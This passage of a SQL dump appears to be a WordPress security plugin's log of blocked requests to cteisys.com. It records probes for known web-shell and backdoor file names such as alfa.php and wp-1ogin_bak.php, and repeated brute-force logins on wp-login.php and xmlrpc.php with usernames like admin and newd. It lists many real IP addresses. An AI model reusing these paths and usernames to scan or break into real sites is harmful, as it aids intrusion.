s/css.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412392.6647,55,'5dWDAxP3rbiSX4GT7V96zoNC','','19|0|0|0|cteisys.com/wp-includes/fonts/css.php',0,19,0),('72.29.76.78',1209879630,'wadminw',0,1665412389.2511,152,'5cfNr8WFmXdzhB6Y3nZLMEQl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.76.51.29',1347171101,'',0,1665412387.6123,55,'PqVFlrStdQs6evmEuiyzhbGo','','19|0|0|0|cteisys.com/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412383.5095,55,'Q7oJXFqR9cD4rPKhm2vfTl8a','','19|0|0|0|cteisys.com/wp-content/wp-1ogin_bak.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412381.7611,55,'vQX4WybaYIi0nV9mu3eotLUg','','19|0|0|0|cteisys.com/wp-booking.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412380.2422,55,'7WR1ebothB46ILVGampJv9cz','','19|0|0|0|cteisys.com/alfa.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412375.3111,55,'WM1gtxhbY738jRcvzFOUwDpi','','19|0|0|0|cteisys.com/alfindex.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412370.5719,100,'zMyHFOX8GakqD9JUsE2YdIfB','','13|0|0|0|cteisys.com/th3_err0r.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412369.4543,100,'5rD1JsI6oTnuc7RLxKZOePfv','','13|0|0|0|cteisys.com/larva.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412364.2456,100,'94fsuOU0lRDq3CoE652hWkXm','','13|0|0|0|cteisys.com/wpindex.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412363.0923,100,'njBCqkeGlaQFWNzP7XuiH9Em','','13|0|0|0|cteisys.com/xmlrp.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412361.3663,100,'S5UHFZk8GNEto3s74cbhPYxj','','13|0|0|0|cteisys.com/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('80.76.51.29',1347171101,'',0,1665412352.5439,55,'xtPBeZDQRdW5nlac0TNOSjq1','','19|0|0|0|cteisys.com/wp-content/db_cache.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412349.8875,55,'uXT56IYrzZVlRU9aAdGJMxKj','','19|0|0|0|cteisys.com/wp-content/plugins/backup_index.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412348.3591,10,'d0tuy3cp2qBH8KMQWX6gboaf','','707|0|0|0|cteisys.com/boom.php',0,707,0),('80.76.51.29',1347171101,'',0,1665412348.3556,55,'d0tuy3cp2qBH8KMQWX6gboaf','','19|0|0|0|cteisys.com/boom.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412282.8675,55,'g4dSEM0vfCLWBaKYGyDo1TlZ','','19|0|0|0|cteisys.com/admin.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412281.7535,55,'r1Y2KIM0TNmfEnU8iqbGscB7','','19|0|0|0|cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412277.9269,55,'Q9iG0qYAeTHEw7ubgp1BSnML','','19|0|0|0|cteisys.com/moduless.php',0,19,0),('80.76.51.29',1347171101,'',0,1665412276.4987,55,'5FlxPm7GHCz2dKJ1RgqQNsDX','','19|0|0|0|cteisys.com/style.php',0,19,0),('96.47.229.59',1613751611,'Joyce',0,1665412113.7519,152,'c27zedjJACfaHm5E6OPVYGbZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('157.230.38.184',2649106104,'wwwadmin',0,1665411937.0840,152,'My02SD35GlXJ61nPd9xAWbeq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'wwwadmin',0,1665411092.2030,152,'jLVDkYdPGIraxhUcgf76AFEv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'newd',0,1665410717.1879,152,'jI7mMQoAH1aXYLg4GCi3ydpT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.6.22.36',2584090148,'wadminw',0,1665410633.0596,152,'BDmgZrKLv75ciHu4a9InlxAG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.57.222.214',1731845846,'',0,1665416871.0013,55,'BI9H1gNmjV6SZiWFnua2tE85','','19|0|0|0|cteisys.com/wordpress-index-keyword.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416869.6808,55,'UL7eqi5vjZGwszYp24SDPgKm','','19|0|0|0|cteisys.com/system-reboot.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416868.4539,55,'jcHWqBOldgvh9iDoRNL3kuzE','','19|0|0|0|cteisys.com/class-wordpress-cloud.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416866.9630,10,'kyzKR3GfEijnb965tdOqge27','','707|0|0|0|cteisys.com/class-detect-spam.php',0,707,0),('103.57.222.214',1731845846,'',0,1665416866.9596,55,'kyzKR3GfEijnb965tdOqge27','','19|0|0|0|cteisys.com/class-detect-spam.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416865.6648,55,'r08zCxpWjo9dcBqAf42vPRMs','','19|0|0|0|cteisys.com/wp-content/wordpress-index-keyword.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416864.2408,55,'cuv7ZhdEkr1NXORfGpT4VSaF','','19|0|0|0|cteisys.com/wp-content/plugins/seoplugins/mar.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416862.5794,55,'wfIze6uVxSoBpMKr1iQcvW2g','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('103.57.222.214',1731845846,'',0,1665416861.2014,55,'RgzL9wYQnBcfuEd71WJliVTt','','19|0|0|0|cteisys.com/wp-content/plugins/core-engine/index.php',0,19,0),('121.40.238.50',2032725554,'wadminw',0,1665416856.1809,152,'BGhzQxkf0orJwv3ZRK5NcFue','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'wwwadmin',0,1665416425.2359,152,'5bn6oXiNMCzPwFx94uvBKA3h','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.158.12.83',2090732627,'wadminw',0,1665415962.1058,152,'uQKnHjDRs6qoYAWJz25bwXUa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.119.213.225',762828257,'wadminw',0,1665415078.7059,152,'nKRDImduX0lvNBiJ6eCkShfZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.79.144.41',860852265,'wwwadmin',0,1665414625.7476,152,'kg4mGiRVZ1s6faIWtbKN3nq0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.170.41',2673453609,'wadminw',0,1665414181.2495,152,'R36o0fyiASuxkdFbUalhLCrH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'newd',0,1665418961.7882,152,'LaSgkhznclE2xNqGBYrMJFb5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.207.31.97',3117358945,'wwwadmin',0,1665418128.0438,152,'v2KW9SnBgO4QFJZE7Ryp5wCz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.5.31',3103917343,'admin',0,1665424525.5182,51,'dPQsEb8zmMf6aN5UYXvn4LWt','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.163.35.152',3265471384,'admin',0,1665423929.0815,51,'imZNETnPxRG0AtsUXSja6qwv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'admin',0,1665423497.4239,51,'zfm5BpTXvlc9AYFS7aj3QKHR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.60.32',3328326688,'newd',0,1665423139.9967,152,'2PNMA7tJyem1Udnk9I3gapsF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.187.58.136',599472776,'admin',0,1665422918.5301,51,'oMXO2petCqVj0ISHNRQfzrx9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.120.27',3165026331,'admin',0,1665422505.2857,51,'VIyQZp6Sdaq9oBrXfFjcnu7h','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('163.44.198.57',2737620537,'admin',0,1665421473.1675,51,'yeczwfUQ6hF0G1dWqSVAtOxY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('89.238.166.235',1508812523,'joyce',0,1665428312.9954,152,'fio0p76ZQdFkP5cTVYq9DJHE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.56',3103917112,'newd',0,1665427943.5756,7,'AKnXsZLbxktCrP579NURpTyl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.69.8.8',2672101384,'newd',0,1665427530.0120,7,'I6ZC7di5zayXnvo4SwWD1r2M','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.105.73.13',795429133,'admin',0,1665426536.5052,51,'2aWEs8HPvjr5Ag4o07kMzNpq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.162.212.214',2997015766,'joyce',0,1665426391.6069,152,'OcjdNVJS5zmQCohYtgE6rq1i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.174.115',3114053235,'joyce',0,1665425958.6545,152,'iXNrxpaHw065ncGsUOSLDmIb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.191.40.94',1438591070,'admin',0,1665425944.0169,51,'lGoMAzWehgHC82Bd0pXtNikZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.62.27',1137524251,'admin',0,1665424931.5793,51,'M43FbjoOKQLlx8SRYp7sBt2u','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.147.16',2319749904,'newd',0,1665431873.9456,7,'pQIHqW5VdrAP28KtsTfmyZNn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1665431472.4147,7,'su34UpjfLSJqCztdK15RwlNy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.183.25',1088665369,'newd',0,1665430907.4264,7,'ZKyAD3eqxBJswuQ9gUOXn6vz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.231.200.129',1877461121,'newd',0,1665429920.9781,7,'UIrxskien8OZvhB52jofVDtm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.214',3497105878,'newd',0,1665429495.8374,7,'sduHvgk7OCMY621VNyBTiIpw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1665428930.5022,7,'lS4dnGe9N6g2AiIjMHTZxQE8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.42.179.67',1076540227,'Joyce',0,1665428660.1243,152,'qkTAHur4gYzNoefn26Iv9xyK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'newd',0,1665428491.3787,7,'zvhBAe7f4ojd9DitgE0V2MNp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'admin',0,1665435426.2533,51,'oUiVxLSQIB8Me6jqp9AGFTWg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.255.81.60',872370492,'admin',0,1665434442.4713,51,'SVux0U2aE94YfvMyBzgkd6Ht','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.46.234.202',3475958474,'admin',0,1665433869.6540,51,'AeXONQxW08P4J9SgvrUdVafM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.129.44',1608089900,'admin',0,1665433447.3547,51,'X3Etj4GHoUVbWR1aYCAfTOyI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.5.31',3103917343,'newd',0,1665432888.5737,7,'XjcuDHfVmtK57n4i6NhkwBAO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.227.183.25',1088665369,'newd',0,1665432450.6231,7,'n82VMlP3XQjsAqzJgNZf01Ym','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('62.102.148.130',1046910082,'Joyce',0,1665439021.1595,152,'Z7e0YnFCyGAVbmqrNtz4JWgT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.186.158',1168358046,'admin',0,1665438867.3457,51,'eAI3Sp2DiNEhcKRt9a0gBTLr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'admin',0,1665438428.5218,51,'fpsHVhoRGv8y0lCQtBDYmgqz','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.63.80.162',775901346,'admin',0,1665437862.8186,51,'9boXlCqSeEjiw2TtfAv8GxpP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.250.116.80',1543140432,'admin',0,1665437436.9715,51,'5Ias2EgkY984KCA1b0MRLuSx','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('44.208.152.20',751867924,'admin',0,1665436845.4074,51,'oZMEi8IplJsAWrRu6V7PX39y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.15',3583549967,'joyce',0,1665436767.5179,152,'cp8xiYLjVZlvwA1PtnS2QURa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.75.221.43',3091979563,'Joyce',0,1665436694.7207,152,'C8wgrijxvdNlaALon3UOH0ZW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('119.237.81.29',2012041501,'admin',0,1665436441.5802,51,'nbjZSiCUXzw4ovRq5ux90NGl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('36.94.142.166',610176678,'admin',0,1665435848.7402,51,'lv5YGknP0gbO8ZU2pSo4uxEV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1665442416.8804,7,'9sfWcNvg70udYBGJyjU5a8ZE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.118',3583549814,'joyce',0,1665440963.3691,152,'FvALRzi95uCIWadbPoxM2fVh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.63.47',2806464303,'admin',0,1665440836.7580,51,'XkhMbDYca85mNAWHtuBGUFCo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.166.183.192',1738979264,'admin',0,1665440418.4407,51,'QHfgZcrau6oWGBL9swN4bD50','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.75.223.219',3091980251,'Joyce',0,1665440338.8726,152,'DEAVzKwQIOyUgR3cYuT2ihXs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.172.168.111',2813110383,'admin',0,1665439866.1347,51,'BhcpCQxaDmoTenPdsJiLFfjr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'admin',0,1665439439.9507,51,'NsObhn9DvlgZiXH2CBqyI76t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665445871.7939,7,'EdRPrp9mAx2gUD3KwXMj6lYv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.22.109.42',2769710378,'newd',0,1665444878.7240,7,'GfQebqF7M4AXozsChcIj5T98','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.101.150.34',778409506,'newd',0,1665444434.1180,7,'TlNAKy48OFbwnHqUWvaXGkdm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('75.119.135.205',1266124749,'newd',0,1665443851.3047,7,'Wum0tlP4526DNML1cCnRA7wb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.56',3103917112,'newd',0,1665443420.9955,7,'eCvnUBx0dLE2r8ORt3SpgKmu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.244',3583549940,'joyce',0,1665443229.6864,152,'RLSCkDe7Y6BvOtb1hZMT48V9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.46.234.202',3475958474,'newd',0,1665442844.4165,7,'lVXAqfgjn8WYyB2Pi35ckowv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.182.249.22',2478242070,'newd',0,1665449947.9352,7,'nh9O8ET6ZP0WwzIcSrDXFtdg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1665449527.9931,7,'xmeyHWa8uXwfR2P5MCScqF7N','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('95.217.129.44',1608089900,'newd',0,1665448941.8859,7,'ZOT3KgbzcqGv1eRW95AHMdrj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.153.214',3497105878,'newd',0,1665448509.2515,7,'oIJ7vLZNaOprwXC5FfTGYgB9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.75.82',1152863058,'newd',0,1665447927.5613,7,'c49XzRnu1SpMCshY3otN5wji','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.65.212.122',1296159866,'newd',0,1665447475.9818,7,'HRt0PdXqymY7vnaMwQVANb9I','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.156.240',908434672,'newd',0,1665446901.9670,7,'fY4IADvhigaoP2WsxSeHNuGy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.121.12',2680912140,'newd',0,1665446454.6158,7,'4z5qNaYR9UiScGgL60MVKe78','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.78.225.32',223273248,'newd',0,1665453604.7091,7,'gnqokxlI76jb1Ff5yzCLrXwv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.140.199',2415168711,'newd',0,1665452998.7299,7,'kJKVbqAeULm5IPiCZdX2rOR1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'newd',0,1665452568.4748,7,'FT0tU1BJ6I3SYbAiCp24dyfa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1665451986.3942,7,'mTtO65hYXiplVQ3BevM91qkJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'newd',0,1665451547.8913,7,'brzEAgTdDHX7O1jv2wPxu3Zn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.172.168.111',2813110383,'newd',0,1665450982.0221,7,'l8HqzpEiVw3GXLjaNDQh4RFI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.46.234.202',3475958474,'newd',0,1665450545.1195,7,'hQ543GqAsvofKUXnZyrVHMu7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1665455040.5165,7,'DSMdYiQyVuWoeXrfl23k1n9C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665454689.8224,152,'bhpKok1xGR2nPt3Hvz0r5qgf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.55.206',3515693006,'Joyce',0,1665454654.9959,152,'rTldM7BAQpPUeozx924HSaL3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('1.117.250.215',24509143,'newd',0,1665454606.9837,7,'dWkVFnJBstyTY95PaQNe3LAb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.75.65.218',575357402,'newd',0,1665454017.4910,7,'0pLHYCkRsAx5KTahnMNZJrvu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.74.120.192',1732933824,'admin',0,1665460784.1963,152,'XevM57GJVfkmKgcWhHFEpLSw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.78.15.126',2018381694,'newd',0,1665460222.3529,7,'928Zo74MDPBkyaLN3nVxJEbc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('40.70.241.53',675737909,'admin',0,1665459942.6659,152,'52YP6Kr1AQxmE9HCpalzWhRb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.110.72.238',795756782,'newd',0,1665459788.2841,7,'I2CB8JkROxd1PuGwWQiKh3jX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.7',3355043335,'Joyce',0,1665458995.2674,152,'Ysptzda30PBoON2Lk7QmHWMq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.200.116.219',3116922075,'joyce',0,1665458986.3834,152,'9fveLz48qsVrDMXKmFAJHhWu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.79.17.158',223285662,'newd',0,1665458761.1285,7,'zoxblgGLa54XUnvA6uhZyqN9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.68.76.32',574901280,'newd',0,1665458141.0273,7,'UYNKzspe83w5byH0PSFJnqLT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.178.138.5',867338757,'newd',0,1665457695.7554,7,'m1VSnfNkJqHTD48vjulLPe9t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('137.184.117.52',2310567220,'newd',0,1665467995.5059,7,'I6LSzBREgmxh7FcXyrKVOd0s','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.110.137.82',2406386002,'admin',0,1665467801.4025,152,'BZSCQFL2TsqI7Ou9n1XJ6wWU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1665467416.4997,7,'kHxNlB9Pzbsr1GanCYiSOZgj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('1.117.250.215',24509143,'newd',0,1665464354.3824,7,'j4sHOLDx5nJ0p6Mg9EXkThrA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.198.161.19',2412159251,'newd',0,1665463979.8125,152,'37vN4uVgTOMQUW1rHYXsFZbB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.63.80.162',775901346,'newd',0,1665463934.1957,7,'I5KfoFxS6DP3LGbvehCmytRA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.183.66',2783491906,'newd',0,1665463578.9313,152,'hEWxZpqz7tgJGw98RAdml3Xo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.36.182.160',908375712,'newd',0,1665463328.6412,7,'mpnks8HRtzre6UuBOvCYVXN0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.64.218.102',574675558,'newd',0,1665463136.6576,152,'lHsEf3MrRIxDduCaYJF10Z8X','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1665462901.7836,7,'aVUh2QABZIsRPLtg9X4CeMyr','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.74.17.225',793383393,'newd',0,1665462308.7051,152,'hvREGcI6aw8QP1HOADydC5L4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.126.223.177',2424233905,'newd',0,1665462307.6127,7,'aqdlt28FDRfjhTbHp3PwJn0Q','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1665461863.4913,7,'ARja9szqVdEbhpev13FSHP0Z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('161.35.68.167',2703443111,'admin',0,1665461491.5135,152,'4q0tbClUnDhY5kLXNHz3IKQ8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.36.182.160',908375712,'newd',0,1665460812.7157,7,'y6n1pxBIikTD2QfKmzJjYqRH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.91.237.106',1432087914,'newd',0,1665461266.1508,7,'MHyLU2of6Fv1bpIEmxYuWt0d','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('93.113.111.100',1567715172,'admin',0,1665467358.9230,152,'lSvA5aLn4E9dP72yupe6hqgF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.97.88.147',2707511443,'admin',0,1665467158.9715,152,'vKgq4SDciJwGoT87hOHLNUzZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.52.120.186',1781823674,'newd',0,1665466987.3282,7,'Qg2Ww8mxAuiBD6ReshUoZTEv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('130.61.143.194',2185072578,'admin',0,1665466884.8182,152,'ABEWFahYuVciwS52mlvsqtQJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.146.202.150',1737673366,'admin',0,1665466653.9542,152,'DveUSoN5RCWHFL2yAcr6zm4i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('175.178.125.173',2947710381,'newd',0,1665466411.4240,7,'QnWOfmMhe30bpBxNgRAj4ryc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.79.8.125',2018445437,'admin',0,1665466411.4116,152,'4tev5gaWsLpOhzfXBIb9dZ10','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.68.19',1753433107,'newd',0,1665465982.9474,7,'nTZCxle8LGYg3uPDvIVbBJaF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('50.87.230.228',844621540,'admin',0,1665465683.3627,152,'1OMXHUu9ZjIv0ktc8La7rK2N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.21.74',2884900170,'admin',0,1665465382.4957,152,'e3pD1RO0HSk5hf7CvQWqYFwK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.207.163',2487799715,'newd',0,1665465375.6000,7,'16Zc3asrSAfluzJt87H4TYK9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.34.62.119',1210203767,'admin',0,1665465138.5542,152,'FICVnrDEb0Z735YQKXdWc6am','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.225.65.31',1088504095,'newd',0,1665464945.1100,7,'cymWvEMY2ZutpLOb0nXDeCIg','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.236.45.171',1760308651,'admin',0,1665464851.5353,152,'eOaQ0xwTfk1RtmBG8j6PNudF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.225.94.95',601972319,'admin',0,1665464612.2042,152,'yeUKj3Yg0qXdBczGn8hb7Qmi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('83.143.116.3',1401910275,'admin',0,1665471462.2918,152,'qByA4CITLNuMrdGKXVzeEZ5b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.104.219.25',2892552985,'newd',0,1665471441.1474,7,'t4RvHB569PMSceo0ixrVIp8L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.116.162',3451483298,'Joyce',0,1665471332.7053,152,'L9SEjZqYniaGFpmNeXHBMgA8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.184.124.136',2310569096,'newd',0,1665471002.5639,7,'6fIjgJU5ly4ZFHGTKdxD9aQM','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('119.18.52.177',1997681841,'admin',0,1665470936.6716,152,'bjoE61marJuZtMTHdQeUsPkn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.111.16',2806476560,'admin',0,1665470704.8103,152,'gxw1Ffz64onkyG8UhbPsLN3Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.190.142.217',3116273369,'newd',0,1665470437.5950,7,'BE5tNF9mYHh83WayUjqeMnfQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.14.224.167',755949735,'admin',0,1665470132.5171,152,'V7pvkQ86DNfbS34TmWixAoOh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('65.0.178.38',1090564646,'admin',0,1665469930.1227,152,'tO2TAMQzBxmISL0fyiJk8nPs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.76.135.117',223119221,'admin',0,1665469721.8813,152,'2G9gcPKJXpuMe8YxAbZlqCzN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'admin',0,1665469492.2324,152,'gQdIrX1v3AFp8Njsnz5BS4kq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1665469422.5992,7,'cZFLu0whKG28NVCkBvIU3Olp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.0.140.186',2634058938,'admin',0,1665469330.5709,152,'tyWDR7PfE5nCv1eKSM9UAXh6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'admin',0,1665468870.8239,152,'pV5MJmrPDIHsuftiaYO4xkQG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.99.98',869426018,'admin',0,1665468449.3430,152,'miYpEnzrLqUPfR2BZtI6bgQu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.254.14',908459534,'newd',0,1665468444.2725,7,'4kyFGRhT3nDXgN6CaLwfY8pe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.241.85.212',2733725140,'admin',0,1665468231.1366,152,'3c8desbrLVyYUf27FWgRC0AE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.211.125.40',3335748904,'admin',0,1665468022.7887,152,'MmXYFDNjovzZintlVas6EqWB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.252.31.59',3120308027,'admin',0,1665482233.3084,152,'SBNfGcpKZQj2MlU4aeui1JH0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('172.96.182.142',2892019342,'',0,1665481893.7241,55,'JAPZcYthipkS0KGljyvMVdz4','','19|0|0|0|cteisys.com/wp-static.php',0,19,0),('115.79.139.135',1934592903,'newd',0,1665478583.1149,7,'NDbQ197tS3TKJG4lkxRy5BiX','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'Joyce',0,1665478544.7892,1